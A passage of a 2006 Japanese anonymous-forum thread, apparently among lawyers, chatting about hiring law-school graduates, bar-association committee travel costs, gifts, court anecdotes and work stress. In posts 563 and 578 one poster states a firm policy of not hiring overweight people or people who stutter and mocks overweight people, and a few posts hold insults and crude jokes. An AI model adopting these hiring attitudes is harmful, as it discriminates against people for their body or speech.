560 :無責任な名無しさん:2006/07/07(金) 12:37:59 ID:JnvMlL8K
>>559
ローもなあ・・・。
優秀なのもいるんだが、半分は激しく勘違いしていて、ちょっとねえ・・・ってかんじ。
エクスターンの時に見られている、って自覚があんまりないのかな。

一応、ロー卒も採用しようと思っているけど、どこのローか聞いてしまうと偏見が入りそうだから、
敢えて聞かないで人物と受け答えのテンポ・内容で決めちゃおうと思っている。

561 :無責任な名無しさん:2006/07/07(金) 12:42:49 ID:6k8hiowg
ローで安心して採用できるのは旧帝大のみだろう。
ロー全体では使えるのは半分もいない。せいぜい4分の1ぐらい。

562 :無責任な名無しさん:2006/07/07(金) 12:48:07 ID:n22EdWaS
使える奴はJP渉外が取っちゃうから街弁のレベルが著しく低下と予想。

563 :無責任な名無しさん:2006/07/07(金) 12:53:52 ID:JnvMlL8K
>>561
そういう思いこみが目を曇らせると思っている。
性格重視かな、うちは。
事務所内でスムーズなコミュニケーションがとれ、客の受けもよい方がよい。
客の受けという観点からすれば、そりゃ、それなりのロー卒が望ましいがね。
素人は権威好きだから。

うちは
デブと非常識人、どもる人は採らないと申し合わせている。

564 :無責任な名無しさん:2006/07/07(金) 13:12:15 ID:vuTCUFK9
>>561
旧帝大の中でも,東大などは研究者を育成するつもりのような講義ばかりらしく,新試験の短答足切りでかなり落ちているという噂。
面談での受け答えで判断するのがいちばん確実。

565 :無責任な名無しさん:2006/07/07(金) 15:21:13 ID:+DeCRr6D
とうりすがりの者です。

>>535
ケンカして嫌いになったんなら、もう縁を切って会わなければいいだけの話じゃないでしょうか。
何があったのか知らないけど、もともと好きで付き合った男でしょう?
そこまでして困らせたいなんて、暗すぎてネタにもならんでよ。

スレ違い失礼しました。

566 :無責任な名無しさん:2006/07/07(金) 15:47:07 ID:HSxm2Ru2
あ,俺はデブだ

567 :無責任な名無しさん:2006/07/07(金) 16:26:31 ID:HSxm2Ru2
ま,それでも>>563のところの弁護士より,俺の方が出来ると思う。

568 :無責任な名無しさん:2006/07/07(金) 16:30:46 ID:6k8hiowg
うちは依頼者の法務担当者が一流大卒ばかりだから、少なくとも旧帝大卒
じゃないと、依頼者が引いてしまう。

569 :無責任な名無しさん:2006/07/07(金) 16:41:29 ID:YnnEbFrn
>>568
東大こんぷ乙w

570 :無責任な名無しさん:2006/07/07(金) 16:57:57 ID:HSxm2Ru2
阪大4年の三男が母殺害自供「しかられ、かっとなり」

 大阪府豊中市の主婦辻森早苗さん(58)が5日、自宅で殺害された事件で、大阪大学工学部4年の三男(24)が7日、府警豊中署の捜査本部の事情聴取に対し、「母親にしかられ、かっとなって殺した」と犯行を全面的に自供した。

 「母親の財布などから奪った金は隠した」とも話し、府警は、三男の供述通りの場所から現金や返り血とみられる血痕が付着した着衣を発見。同日午後にも、三男を強盗殺人容疑で逮捕する方針。

 三男は府警の事情聴取を受けた後、6日早朝、自殺を図ったが、命に別条はなく、府警が事情を聞いていた。
(読売新聞) - 7月7日14時35分更新

571 :無責任な名無しさん:2006/07/07(金) 18:09:57 ID:k2cIsVpT
>>568
旧帝大って.....
華族の方ですか?

572 :無責任な名無しさん:2006/07/07(金) 18:36:04 ID:6k8hiowg
華族は「学習院」だが・・・

573 :無責任な名無しさん:2006/07/07(金) 18:43:42 ID:k2cIsVpT
頭が化石という意味ですが....

574 :無責任な名無しさん:2006/07/07(金) 18:55:15 ID:6k8hiowg
「華族」=「頭が化石」というのは、皇族華族に対して無礼では?

575 :無責任な名無しさん:2006/07/07(金) 19:09:23 ID:k2cIsVpT
あのね....
華族も帝大も今はもうない制度
そんなのに拘っている頭は化石だろう,っていう意味
化石以前か...

576 :無責任な名無しさん:2006/07/07(金) 21:07:53 ID:hg8zyiBE
↑ そこら辺の皆さん方は、そろって学歴板に移転を!

弁護士世界では、学歴は基本的には問題となりません。
まー、額縁入りの東大法学士証書を事務所に飾っている先生や、
東京阪大でしかとらないと広告してひんしゅくを買った事務所もあるが。

577 :無責任な名無しさん:2006/07/07(金) 21:15:09 ID:ISa9JHzD
>>576
それは今までの話になりそうだな。


とか言ってると、ロー生のひんしゅくを買いそうだが。
最近はあの岡口さんまで叩かれてるんだから怖い怖い。
http://school5.2ch.net/test/read.cgi/shihou/1151314425/

578 :無責任な名無しさん:2006/07/07(金) 21:18:27 ID:JnvMlL8K
>>567
できの善し悪しじゃないよ。

デブは暑苦しいし、客もデブは嫌うだろうし、近づくと酸っぱい匂いがするし、何かの拍子に触ると汗がくっつく。
すれ違うときもデブだと難しくなるし、飲みに行ってもやたら食うから割り勘で損した気になる。

だから採用したくないと言っているだけ。

決してデブが無能とは言っていませんから。

579 :無責任な名無しさん:2006/07/07(金) 22:26:55 ID:tQgAYkme
そうだな。誰でも弁護士になれる時代だから、学歴が大事になるな。

580 :無責任な名無しさん:2006/07/07(金) 23:21:25 ID:WIve8JJL
>>578
デブにいじめられでもしたのかw
デブコンプだな。

581 :無責任な名無しさん:2006/07/07(金) 23:31:39 ID:HJFehuyo
弁護士も客商売だからな。
外見は大事。

582 :無責任な名無しさん:2006/07/07(金) 23:45:05 ID:SEUaJlfU
すみません。当方非弁ですが質問します。

民事訴訟で当事者双方が代理人として弁護士を立てる場合が多いですが、代理人同士が司法修習の同期の場合もあろうかと思います。
その時、どういう心境になるのですか?

あと、民事刑事問わず担当裁判官が自分と同期だったとかという場合もあろうかと思います。
そういう場合、弁護士としてはどう感じるのですか?

583 :無責任な名無しさん:2006/07/07(金) 23:45:08 ID:c8XAKW8r
痩せてても神経質そうに見えたらダメだし、
太っていても貫禄があるように見えればOKだし。

結局はその人のキャラだと思うが。



584 :無責任な名無しさん:2006/07/07(金) 23:50:37 ID:rsHYGHTd
自分は弁護士ではないんですが、できたら、司法修習のカリキュラムとして、
民間企業で一定期間働くとか組んでもらえないですかね?
勉強大変だったのはわかるんですけど、たまにものすごく常識はずれた弁護士
にあってびっくりすることがあるので。

もちろん、全ての人がおかしいわけではないですよ。ただ、一人変な人がいると、
みんながそう・・・って思われるのが人間だから。

585 :無責任な名無しさん:2006/07/08(土) 00:07:25 ID:gfF5/uTI
584一人がおかしいだけで、
民間企業の従業員みんながそう・・・って思ってしまうのが人間ですねw

586 :無責任な名無しさん:2006/07/08(土) 00:39:53 ID:NWBdKkM1
日弁から,修習終了者採用見込みのアンケートが何度も何度も来る。
たぶん,返事を出してるわずかな回答の内容では,とても新試験卒に厳しく,とても大幅増員を裁ききれない結果になってたのだろう。
たくさん回収して,採用見込みを書いてくれる回答の絶対数を増やすつもりなのかな?
社保庁の保険料納付率の水増しみたい。


587 :無責任な名無しさん:2006/07/08(土) 10:36:55 ID:4yQJRIul
>582
和解の時に話しやすいと思う程度で、特別に何も思わない。
同期じゃなくても田舎でやっていると担当裁判官も相手方弁護士も
刑事事件なら検察官(副検事)も知り合いであることがよくあるが
特別知り合いだからどうのこうのということはない。

588 :582:2006/07/08(土) 11:03:32 ID:BrDFhn88
>>587
>>582です。
別に相手方弁護士や担当裁判官が同期だったからといって、特別なんとかということはないんですね。
ありがとうございます。

589 :無責任な名無しさん:2006/07/08(土) 11:58:49 ID:KsJW/GKB
要は、知ってる同市なら、信頼関係か不信関係かのいずれかがあるというだけです。

大学・修習同期の判事、弁護士間で、検事から不相当意見が戻ってきた保釈につき、
弁護士が「今、検事と会ってきました。
書面では不相当ですが、別に異議はないですと言ってます」と言うので、
やおら、判事は「では、直接に聞いてみましょう」と検事に電話して、
「検事は、保釈されたら準抗告する、と言ってますが、どうします。」と言って、
取り下げさせた件が有りましたね。
同判事は、「アイツは、学生時代から友人間ではウソつきで通っていました」と言ってました。

590 :無責任な名無しさん:2006/07/08(土) 14:02:58 ID:Xhj4U/5H
>>578
>飲みに行ってもやたら食うから割り勘で損した気になる。

食う奴より飲む奴相手の方が割り勘は損するぞ。
と、割り勘の度にちょっぴり申し訳ない気がする俺が言っておく。

591 :無責任な名無しさん:2006/07/08(土) 14:10:44 ID:N1bULvL1
>>589
で、あんたは誰?
>>578
なんか貧しいな。

592 :無責任な名無しさん:2006/07/08(土) 16:19:08 ID:+jmhHQ13
>>582
全く関係ない。
手心を加えようとか、そういうのは全くないよ。
特に何も感じない。

仕事は仕事。

593 :無責任な名無しさん:2006/07/09(日) 13:40:11 ID:kIzZp803
>>586
うわさですまんが、リクルートとともに新サイトを立ち上げるかもしれんとさ。

594 :今も仕事してるんですが…:2006/07/09(日) 17:53:26 ID:N69qwo6i

_,..-――-:..、    ⌒⌒
     /.:;;;;;;;;;;;;;;;;;;;;;::.\      ^^
    / .::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::..ヽ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  :::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::
   :::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::
     :::::::;;;;;;;;;;;;;;;;;;;;;;;;;;;:::::  .ξ  ∧_∧
      ::::::::::::::::::::::::::::    ・━( ::;;;;;;;;:) ふ〜
        ::::::::::::        /⌒`'''''''''''^ヽ また明日から仕事だな・・・
               /⌒ヾ/ / .,;;;;;;:/.:;|
-―'――ー'''‐'ー'''―‐'―''''\,./ / .::;;;;;;:/‐'| :;|'''ー'-''――'`'
 ,, ''''  `、 `´'、、,   '''_ソ / `:;;::::ノ,,, | :;|皿'''  、、,
    ,,,   ''  ,,   ''''' ξ_ノ丶ー'ー< ,ゝ__> '''''  ,,,,
 ,,     ,,,,     ''' ,   ::::::::;;;;;;;;;;;;;;;;;;;;;;;;;;:::::::  ,,

595 :無責任な名無しさん:2006/07/09(日) 18:07:29 ID:VJdlWoTw
そのセリフは今日も仕事をしている俺にはうらやましく聞こえる。

596 :無責任な名無しさん:2006/07/09(日) 19:46:10 ID:qeGs4BRG
ミサイルが飛んできて,裁判所にブチ当たらないかな…。

597 :無責任な名無しさん:2006/07/09(日) 20:24:21 ID:Z3NE7YJR
阪神大震災の日に大阪地裁で法廷開いた裁判官もいる位だし(さすがに神戸はダメだったようだが)
それぐらいでは期日が飛ばなかったりして

598 :まだ終わらないんですが…:2006/07/09(日) 22:53:30 ID:N69qwo6i
>>595
名前欄ご参照

599 :無責任な名無しさん:2006/07/10(月) 00:03:22 ID:f6pagndw
w

600 :無責任な名無しさん:2006/07/10(月) 09:37:17 ID:QM7HBGYW
俺も阪神大震災の日、大阪地裁から何故弁論に来ないんだと電話がかかってきたぞ。
歩きに歩いて昼過ぎにようやく事務所にたどり着いたのにさ。


601 :無責任な名無しさん:2006/07/10(月) 09:53:12 ID:AQ7BEzyc
>>500
弁護士ラベンダー読書日記
http://d.hatena.ne.jp/la-law/20060710
2006-07-10■[雑誌]判例時報1928号

本件の国賠はあっさり棄却されていますが…、第2小法廷で同種事件
としてまとめて受理されるべきところを不注意で取りこぼされたのでは、
と思ってしまいますね。



602 :無責任な名無しさん:2006/07/10(月) 10:47:24 ID:LZKOUwph
もしやと思って、調べたけど、第2小法廷は、平成16年 2月26日の津野裁判官の
就任から、平成16年12月27日の今井裁判官の就任まで異同ないな。つまり、不受
理決定から最高裁判決まで全部同じ裁判官。

603 :無責任な名無しさん:2006/07/10(月) 12:48:09 ID:AQ7BEzyc
>>597,600
参議院会議録情報 第145回国会 法務委員会 第11号
http://kokkai.ndl.go.jp/SENTAKU/sangiin/145/0003/14505180003011c.html

○参考人(畑郁夫君)

私、ちょうど阪神大震災のころに大阪地裁所長をいたしまして、官舎が全壊、危うくけが等がなくて
済んだという経験をしております。

そのときに、震災でどのぐらい神戸に応援すべきかということを考えました。

まず、上級庁とももちろん相談しましたけれども、大正の関東大震災でシミュレーションをやりました。

これで調停委員の数あるいは調停事件が非常に激増するだろうと予測を立てまして、応援を求めま
して、大阪の民事調停委員に臨時の代行で、特に法律知識のある弁護士の調停委員にお願いいた
しまして、幸い大多数の賛同を得まして兼任辞令を出したというような措置をとりました。

 ところが、これは時代あるいはそれこそ社会的条件が違うのかもしれませんけれども、それほどで
はなかった。

逆に、なぜ関東大震災のときにあれだけ調停事件が盛況になったのかということを少し勉強しなけれ
ばならないなと思ったこともございました。

裁判所は事件の予測というのは大変難しゅうございます。


畑郁夫-弁護士法人大江橋法律事務所
http://www.ohebashi.com/Lawyers/hata_ikuo.html

604 :無責任な名無しさん:2006/07/10(月) 12:57:27 ID:LZKOUwph
修習生のとき、当時の神戸地裁の所長だった人の講話を聞かされた。
被災者のために庁舎を開放した、ものすごく勇気のいる決断だったという
ような話だったが、オレを含めた修習生は、そんなん当たり前じゃん、そん
なの自慢にならんだろうと冷めた目をしていた(聞いていた修習生の半分
は寝てたし)。

605 :無責任な名無しさん:2006/07/10(月) 13:50:20 ID:bU2av6HD
>>604
公務員の中で、裁判官及び裁判所職員はもっとも、
国家、国民のために仕事をするという意識が少ない部門です。

逆に言えば、なくても、ほとんどの国民が困らない存在でもあります。


606 :MS754 ◆yGUnQdhyV2 :2006/07/11(火) 00:04:49 ID:VnvcwGo7
本日の果物

サクランボ 2パック(佐藤錦) 

累計

メロン 6個  サクランボ 4パック(佐藤錦)  マンゴー 3個
ミカン 1箱(15s)

どうして今年は、メロンが少ないのだろう?



607 :無責任な名無しさん:2006/07/11(火) 09:26:04 ID:xYY9HGl+
朝から極端に仕事がやりたくない。
尻ぬぐいや尻ぬぐいのせいで俺の事件までとばっちりを受けたことのフォローとかが午前中一杯は続く。
早ければ夕方までには終わるだろうか。
俺がバカだからヘタ打ってるみたいに見えるんだろうなあ。

悪いのが一度に押し寄せてる。なんか冗談抜きで死にたいくらいだ。

608 :無責任な名無しさん:2006/07/11(火) 10:43:38 ID:UkBHCgpC
悪いことは不思議に重なるもんだ。
今日一日で済むことなら,まあ頑張れ。

609 :無責任な名無しさん:2006/07/11(火) 12:14:47 ID:uYHI9sXr
この仕事をしてると、報酬がたくさんもらえたとか、画期的な判決を
取ったとか、依頼者に大変感謝されたといったことより、
嫌なことがひとまず片づいたとか、嫌な事件がとりあえず終わった
というようなときの方が遙かにうれしいよな。
まあ、嫌なこともきっといつかは終わるはずと信じてやってくしか
ないよな。

610 :無責任な名無しさん:2006/07/11(火) 12:27:14 ID:saFkcb2v
その点裁判官や検事はいいよ。
4月の異動で嫌な事件とおさらばできるんだから。
#移動先で新たな嫌な事件というのもあるらしいが。

611 :無責任な名無しさん:2006/07/11(火) 14:11:08 ID:UkBHCgpC
確かにJPは3年に一度ゲームみたいにリセットできるよな。

612 :無責任な名無しさん:2006/07/11(火) 15:10:20 ID:T75by4Tm
>>606
センセのところメロン少なめ?
うちはメロンの集中砲火を食らったような勢いですよ。
いつもは事務員さんに切り分けてもらうけど
今年は玉のまま持って帰ってもらってます。

613 :無責任な名無しさん:2006/07/11(火) 15:57:07 ID:eAB33rfQ
>>545
低能が刑務所入れやボケ

614 :学籍番号:774 氏名:_____:2006/07/11(火) 16:16:42 ID:ISxg6Aqc
さっき、法務大臣がTVに出てて「性犯罪や薬物犯罪などの軽い刑は
懲役刑にせず、社会奉仕などの処置を取る」って言ってたけど
性犯罪を「軽い刑」って…
何だかなあ…

615 :無責任な名無しさん:2006/07/11(火) 16:55:04 ID:cOwsFqM2
「学籍番号:774」って・・・
一体どこの板から来たんだw

616 :無責任な名無しさん:2006/07/11(火) 16:59:46 ID:UkBHCgpC
性犯罪犯したやつはチンポ切り落とせ
 
 by ハンムラビ法典

617 :無責任な名無しさん:2006/07/11(火) 18:25:00 ID:6ALUUMx2
>>606
メロンに飽きた事務員が、「先生へのお中元は何が喜ばれますか?」「いつもメロンばっかり
沢山頂いてます。」とか言ってるんじゃ?
で、気を利かせてメロン以外にしてきてるのかも。

618 :MS754 ◆yGUnQdhyV2 :2006/07/11(火) 21:41:27 ID:VnvcwGo7
>>609
本当に、その通りだと思います。○○事件、早く終わってくれ!!!
>>617
なるほど、今年は、いやにクッキー、カステラなどを含めた菓子類が多く、
事務局は例年以上ににぎわっています。



619 :無責任な名無しさん:2006/07/11(火) 21:50:49 ID:YjEy7l5r
終わって欲しいと思う事件ほど長く続き,事件や依頼者に事務所内だけで通用するアダ名が付く。

620 :無責任な名無しさん:2006/07/11(火) 22:31:32 ID:du1wRvuM
最近メディアで被疑者の卒業文集をとりあげてあげつらうのが流行ってるけど
これってプライバシー侵害で訴えれば絶対勝てるよね

621 :無責任な名無しさん:2006/07/12(水) 07:05:59 ID:/I6uyBNw
あげつらう?
プライバシー?
絶対勝てる?

???????

622 :無責任な名無しさん:2006/07/12(水) 09:33:13 ID:9SmtMEOE
司法浪人つれー。
一年目だけど、無職という負い目で精神的にやられそう。
法科大学院に入った方が良いかも。


623 :無責任な名無しさん:2006/07/12(水) 09:42:01 ID:xOHeKgXb
>>620
犯罪報道に関する刑法条文や刑事民事の判例嫁。
非弁のいい加減な投稿はお断りします。

624 :無責任な名無しさん:2006/07/12(水) 10:53:28 ID:2XswdNLj
<最高検>供述調書に容疑者らの割り印指示 ミス相次ぎ
http://headlines.yahoo.co.jp/hl?a=20060712-00000009-mai-soci

>容疑者らによる割り印の導入を巡っては、法務・検察当局がここ数年、
>内部で論議を続けてきたという。
>実施すると、在宅の容疑者や参考人の場合は印鑑で済むが、逮捕・
>拘置中の容疑者の場合、取調室に印鑑を持ち込めない規則になって
>いることから、指印を求めざるを得ない。このため複雑な事件の場合、
>調書は数百ページに及び、そのすべてに指印を押させることについて、
>第一線の現場からは「容疑者との信頼関係が崩れ捜査に支障が生じる」
>との反対論が出ていた。

割り印を押させて信頼関係が崩れるってどんな信頼関係だよw

625 :無責任な名無しさん:2006/07/12(水) 13:33:44 ID:hcMt45df
修習中普通に作り替えてるのを見たことがある。
別に内容を変えていたわけではないけど疑問だなと思ったが,一緒の班の奴らがみんなP志望であり,かつ調書の作り替えを
「ちょっとしたプロの裏技を見せてもらえてうれしいなありがとうございます。でも秘密はちゃんと守りますよ」
的な好意的な反応をしていたので,ばかばかしくなり,何も言わなかった。

そういう奴らが検察官になってるんだから,検察官でも優秀な奴は優秀なことに変わりはないけれど,一般検察官のレベルは低くなってると思う。
ごますりとかこそくな奴が多い
中には内容変える奴もいるだろう

626 :無責任な名無しさん:2006/07/12(水) 13:54:20 ID:2XswdNLj
同じく誤植をプリントアウトし直してふつうに
割り印を偽造してるのを見たことがあるw

627 :無責任な名無しさん:2006/07/12(水) 16:01:32 ID:2RSq/ox7
独立するときについて教えてください。
独立にあたって書籍を大量購入すると割引ってしてもらえるものですか?
それから書籍って単年度ごとの経費にしかならないものですか?
書籍みたいなもので、減価償却なんてできるんだろうか。
今までは、その年その年に購入した書籍分をまるまる経費にしていたけど、
100万〜200万単位でまとめて購入したときに、1年分の経費になっちゃうのは
勿体ない気がする。ちょこちょこ購入した方がいいのかな。

628 :無責任な名無しさん:2006/07/12(水) 16:06:38 ID:ievV3EMp
俺は儲かった年の年末に大量に購入している。

629 :無責任な名無しさん:2006/07/12(水) 17:20:45 ID:DPL6TbiY
自由と正義の巻頭言に、おいおいという人がおいおいということを書いてるな。

630 :無責任な名無しさん:2006/07/12(水) 17:23:56 ID:UQOzZS7U
まだ来てね

631 :無責任な無責任:2006/07/12(水) 17:27:24 ID:yiTSeEZ5
 巻頭言は2人いますが、どちらですか?それとも、2人ともかな?

632 :無責任な名無しさん:2006/07/12(水) 18:18:06 ID:HXertRgO
>>618
ああ。それは、事務員の人が欲しい物を伝えてるね。
おいらはメロンが欲しいんじゃあーって事を、関係各位に通達した方がwww

633 :無責任な名無しさん:2006/07/12(水) 18:23:35 ID:hcMt45df
当方地方故自由と正義の到着が楽しみになりました。

634 :無責任な名無しさん:2006/07/12(水) 22:30:50 ID:dtY5k1Uw
今日は総本山の某委員会に招集されて東京まで逝ってきた。
総本山の委員会に出るのは初めてだが、実にむなしい1日だった。
某シンポの準備のための会議らしいが、これこれの問題があるから
シンポを行って検討、討議していこうというのではなく、
シンポをやるからそのためにテーマを決めようという感じで
何とも本末転倒な感じだ。
シンポのテーマとして、市民の弁護士へのアクセスというような
ことを考えているようだが、つまらない会議のためにわざわざ
過疎地の方や相当な遠方からも結構な数の弁護士を呼び寄せるのも
どうかと思う。
そんな会議に出てる暇があるなら、安くない弁護士費用を払ってでも
事件の解決を弁護士に任せている人の事件の処理を少しでも早く
行ったり、地域の法的需要にきちんと応えることこそが弁護士の使命
なんじゃないかと思う。
まあ、単位会の会長の顔をつぶすわけにもいかないから、これからも
それなりに出席して前向きに協力していくポーズはとろうとは思うが、
何だかなあ。
みんな時間をやりくりしてまじめにやってるんだとは思うが、その方向性が
どうかと思うなあ。

635 :無責任な名無しさん:2006/07/12(水) 23:12:39 ID:LndoDwRl
著作権の20年延長の文化庁の見解をみて、あほかと。
立法担当者のくせに、なんだこの法律知識はと思ったのは、私だけでしょうか?


636 :無責任な名無しさん:2006/07/12(水) 23:16:28 ID:YlcjYbYq
○野○三郎がまた、懲戒くらってた。

637 :無責任な名無しさん:2006/07/12(水) 23:16:31 ID:1loYcy6j
>>635
それが文化庁クオリティw

638 :無責任な名無しさん:2006/07/12(水) 23:18:05 ID:g1npo92h
弁護士は絶対に身の丈を超える借金をしちゃいけないなと思った

639 :無責任な名無しさん:2006/07/12(水) 23:24:56 ID:LndoDwRl
y=1/x のグラフは、x=0では、接着していない。
−側から近づくと、yは−無限大。+側から近づくとyは+無限大。

文化庁は、法律も知らないようだが、数学的センスもないようだ。

640 :無責任な名無しさん:2006/07/12(水) 23:30:07 ID:1loYcy6j
>>639
それが文化庁クオリティw

専門分野のはずの盗作も見抜けません。

641 :無責任な名無しさん:2006/07/12(水) 23:49:54 ID:LndoDwRl
文化庁の人は、4月1日生まれの人が、どうして学年が1つ上になるのか
その理由を知らないんだろうな・・・

642 :無責任な名無しさん:2006/07/13(木) 05:23:16 ID:L8vtJNoR
>立法担当者のくせに、なんだこの法律知識はと思ったのは、私だけでしょうか?
通らない理屈と知りながら強弁しただけ。悪質。

643 :無責任な名無しさん:2006/07/13(木) 08:55:47 ID:ZUh+t5nG
>>641
俺知らない。
どうして?

644 :無責任な名無しさん:2006/07/13(木) 09:58:27 ID:A1+GOHzG
>>622
昔は,
大卒2年で受かれば天才,
4年で受かれば秀才,
6年で受かれば凡人,
10年経つと仙人になるといわれていた。

>>624
割印だけじゃなくて,訂正印も全て指印を一緒に押しておかないといけなくなるな。
膨大な末尾添付資料がある調書なんかどうするのかね。

645 :無責任な名無しさん:2006/07/13(木) 10:02:50 ID:A1+GOHzG
>>634
帰りがけにエレベータホールでそんな話してたろw
しかし,貴職の意見に同意。日弁は成果の見えないイベントが多い。

646 :無責任な名無しさん:2006/07/13(木) 11:15:11 ID:iTnlapdx
>>634
俺、出席していないことに罪悪感を感じていたけど、少しやわらいだ。

647 :無責任な名無しさん:2006/07/13(木) 11:17:41 ID:3ft1XsYA
田舎もんにとっては交通費出してもらって東京に遊びに行ける機会でもある。
この間は六本木ヒルズを見学してきた。

648 :無責任な名無しさん:2006/07/13(木) 11:21:44 ID:A1+GOHzG
>>647
地方による。
羽田に着いたら日弁直行,会議が終わったら羽田直行。
日帰りしようと思ったら,東京で遊ぶ時間はない。

649 :無責任な名無しさん:2006/07/13(木) 11:23:12 ID:A1+GOHzG
地方の弁護士過疎を解決するには,まず,日弁の仕事のために時間をとられる地方弁護士の負担を解決したほうがよいのではないか。


650 :無責任な名無しさん:2006/07/13(木) 11:25:08 ID:jVV0a/s7
>>648
うちのボス、よく「銀河」に乗って帰ってくるなぁ。

651 :無責任な名無しさん:2006/07/13(木) 11:33:36 ID:wcbL9k/u
銀座→銀河じゃね?

652 :無責任な名無しさん:2006/07/13(木) 11:36:30 ID:0ceTHx2I
>>648
北斗星3号だと翌朝10時の弁論に間に合いません。_| ̄|○
函館や室蘭支部なら間に合うんだけどね。

653 :無責任な名無しさん:2006/07/13(木) 11:54:10 ID:muARjj9z
>>647
交通費は一体誰が出すの?まさか日弁連が?

654 :無責任な名無しさん:2006/07/13(木) 12:03:06 ID:3ft1XsYA
当然日弁連だよ。
グリーン料金で出してるのかな?
日弁連の委員会はくだらんが,それは単位会でも同じこと。

655 :無責任な名無しさん:2006/07/13(木) 12:05:24 ID:vDAbK3Fz
>>653
もちろん、日弁連の委員会なんだから、日弁連が出しますよ。
地方の弁護士50人呼んで、一人平均で往復2万としても、
1回の会議でざっと100万w

656 :無責任な名無しさん:2006/07/13(木) 12:07:07 ID:muARjj9z
>>654
電話会議でやれるならやってほしい。会費無駄遣い。
行くなら自腹で言ってくれ。東京から地方に弁護士会内会派の関係で行くとき(そればっかり)は自腹だ....

657 :無責任な名無しさん:2006/07/13(木) 12:10:04 ID:3ft1XsYA
自腹にしたら恐らく定足数に満たないよ。
外にも無駄遣いはいっぱいある。
だから不当に高い会費なワケ。

658 :無責任な名無しさん:2006/07/13(木) 12:27:22 ID:90n/xCEK
>>656
ML作れよ。

659 :無責任な名無しさん:2006/07/13(木) 12:27:48 ID:Pfx8D6NL
うちの委員会はグリーン料金が出る。
委員会によっては、グリーンじゃないところもあるらしい。
委員会は半日以上かかるので、電話会議なんて無理。
テレビ会議システムならなんとかなるのかな?
でもそんな立派なもの、うちの会にはないけど。

660 :無責任な名無しさん:2006/07/13(木) 12:41:41 ID:8Jmt+1FA
自由と正義を見たが、どちらがトンデモ巻頭言だ? 分かんないよ。
2番目か? 確かオウムの青山弁護士も悩んでいた腰痛がヨガで治った
という理由からのめり込んでいったようだが・・・・・・

661 :無責任な名無しさん:2006/07/13(木) 13:18:30 ID:90n/xCEK
>>660
筆者を知っている人が見れば分かるけど、知らなきゃ分からないと思う。

662 :無責任な名無しさん:2006/07/13(木) 13:54:08 ID:A1+GOHzG
せめて,大阪と東京で電話会議にするとか。
出席者は大阪か東京に行けば済む。

663 :無責任な名無しさん:2006/07/13(木) 15:26:33 ID:8Vo2iGx3
【サッカー】フランス人弁護士がW杯決勝の無効試合を要求
http://news18.2ch.net/test/read.cgi/mnewsplus/1152768118/

664 :無責任な名無しさん:2006/07/13(木) 15:26:50 ID:AzuFEjcK
>>656
それは会派の問題だろ
日弁の問題とは別。会派に加入義務ないだろ

665 :無責任な名無しさん:2006/07/13(木) 16:10:20 ID:8Jmt+1FA
>>661
猿か? 確かこの事務所、ネットでここのクレサラの広告を頻繁に見かけるが・・・

666 :無責任な名無しさん:2006/07/13(木) 17:46:59 ID:DRsL3Wn/
まあ,俺は仏教好きだけど,本格的な仏教の教義は
トンデモなものが多い。

空海の真言密教の教義なんて,基地外の妄言と紙一重。

巻頭言を読んだけど,この程度じゃ何とも思わないな。


667 :無責任な名無しさん:2006/07/13(木) 18:38:49 ID:1N9LMDur
よく広告出してるとこが巻頭言飾ったのかw
「わが弁護士会も市場原理に支配され弁護士の品格を失いつつあるのではないか」
は、つっこみどころなのかな。

668 :無責任な名無しさん:2006/07/13(木) 19:30:45 ID:AzuFEjcK
自分から書かせてくれって手を挙げたのかな


669 :無責任な名無しさん:2006/07/13(木) 19:38:53 ID:w6eZsELi
しかし民訴法学者が物損の慰謝料1000万円請求ってw

670 :無責任な名無しさん:2006/07/13(木) 19:53:20 ID:AzuFEjcK
学者
だからなw

671 :無責任な名無しさん:2006/07/13(木) 20:23:46 ID:KzHo0qCD
40 :氏名黙秘 :2006/07/13(木) 00:52:29 ID:???
今日、千歳烏山で小学校ぐらいの子供が「法律事務所ホームロイヤーズ〜」なんて
CMソング口ずさんでいたぞ。




672 :無責任な名無しさん:2006/07/14(金) 01:32:14 ID:hu3WKrMQ
おっとw

673 :無責任な名無しさん:2006/07/14(金) 01:38:25 ID:ijGeSA55
190 :氏名黙秘 :2006/07/13(木) 23:50:09 ID:???
今日1期の先輩に聞いたんだが、慶應ロー1期は、新試短答落ちが一人も出てない可能性が高いらしいぞ
マジか???予備校模試で上位者が多かった(らしい)とはいえ、全員短答通過というのは俄かには信じがたい驚愕の結果なんだが、、、

誰か他に情報持ってるやついる?

674 :無責任な名無しさん:2006/07/14(金) 01:43:03 ID:Iqg+PnEw
マルチコピペはヒンシュクだよ。
それにそんなガセヨタ流す後輩見るのも哀れだなー。

675 :無責任な名無しさん:2006/07/14(金) 10:00:22 ID:PMwHxdPa
新試験の短答がどのくらいの倍率なのか知らないが,最終的な倍率でもたかだか2倍なんだろ。
旧試験が40倍程度だったのと比べるとザル試験だな。

だから,短答で落ちる奴がいないってのも,何も不思議じゃないと思うよ。
倍率2倍なんてのは,難関の県立高校程度なんだから。

676 :無責任な名無しさん:2006/07/14(金) 10:09:22 ID:VXO7s2ye
伝説の新1期になりそうな希ガス

677 :無責任な名無しさん:2006/07/14(金) 10:28:05 ID:LmFR90q5
O阪弁護士会のHPに「理事者掲示板」というのがあった。
会員は自由に理事者への意見等をカキコミ、それに対して理事者が返事をカキコムというものだ。
結構きわどい意見等もあり、俺はひそかなファンだった。しかし、最近見ると
掲示板がなくなっていた。会員が自分の意見を自由にアピールしたり、理事者が回答するというのは
画期的でいい制度だと思ったのだがなぁ・・・
下々の者が自由に意見を言うのはやっぱり邪魔なのかな?

678 :無責任な名無しさん:2006/07/14(金) 10:50:55 ID:VXO7s2ye
K弁護士会のメーリングリストも結構きわどいよ。
但し理事者に回答義務はない。

679 :無責任な名無しさん:2006/07/14(金) 13:00:12 ID:BRl91sH1
>678
きわどく、いえ、鬱陶しくしているのはあなたです。
お願いですからもうメーリングリストに投稿しないで下さい。
こちらの巣へどうぞお帰り下さい。
皆さん、ひきとってあげて下さいね。

680 :無責任な名無しさん:2006/07/14(金) 20:12:10 ID:WR2hC4bV
k弁護士会って、ひょっとして、地下鉄にクレサラ相談無料とか
広告出してる弁護士会ですか?

681 :無責任な名無しさん:2006/07/15(土) 11:30:57 ID:mY/IYKHi
 

